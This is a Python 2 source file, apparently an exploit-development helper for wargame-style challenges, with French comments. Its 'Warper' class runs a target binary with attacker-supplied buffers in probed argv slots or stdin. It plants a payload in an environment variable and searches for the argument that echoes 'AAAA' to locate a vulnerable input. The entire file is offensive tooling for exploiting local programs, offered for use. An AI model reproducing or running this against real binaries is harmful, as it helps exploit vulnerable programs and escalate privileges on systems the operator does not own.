import os
from subprocess import Popen, PIPE
class Warper:
def __init__(self, *data):
self.env = os.environ
self.input = True
if(str(type(data[0])).find('str')<0):
raise Exception
self.path = data[0]
if(len(data)==1):
if(self.getArg()<0):
print '\x1B[0;31mUnable to find vuln\x1B[0m'
os._exit(-1)
if(len(data)==2):
self.argSploit = data[1]
self.argPayload = 0
elif(len(data)==3):
if(data[1]==data[2]):
raise Exception
self.argSploit = data[1]
self.argPayload = data[2]
print '\x1B[0;32mVuln in argv %d, sploit in %d\x1B[0m' % (self.argSploit, self.argPayload)
def spwn(self, buff, payload, std):
# creer un process en fonction des arguments a exploiter
stdin=None
stdout=None
stderr=None
final = False
if(str(type(std)).find('int')<0):
final = True
args = [self.path]
max = self.argSploit
if(max < self.argPayload):
max = self.argPayload
for i in range(max+1):
if(i==0):
pass
elif(i==self.argSploit):
args.append(buff)
elif(i==self.argPayload):
args.append(payload)
else:
args.append('x')
if(self.argPayload==0):
self.env['pwniz'] = payload
if(final or std&1 or self.input):
stdin=PIPE
if(final or std&2 or std<0):
stdout=PIPE
if(final or std&4):
stderr=PIPE
try:
p = Popen(args, env=self.env, stdin=stdin, stdout=stdout, stderr=stderr)
if(self.input):
ret = p.communicate(buff)
elif(not final):
ret = p.communicate()
if(final):
ret = p.communicate(std)
except:
return ' '
if(std<0):
return p.wait()*-1
return ret
def getArg(self):
# trouve de facon dynamique les arguments faillibles et ou mettre le payload
self.argPayload = 0
self.argSploit = 0
ret = self.spwn('AAAA', '', 3)[0]
if(ret.find('AAAA')<0):
self.input = False
for i in range(20):
ret = self.spwn('AAAA', '', 3)[0]
if(ret.find('AAAA')>=0):
break;
self.argSploit = self.argSploit+1
self.argPayload = self.argSploit+1
ret = self.spwn('AAAA', 'x', 3)[0]
if(ret.find('AAAA')<0):
self.argPayload = 0
if(self.argSploit == 20 and self.argPayload == 0):
return -1
return 0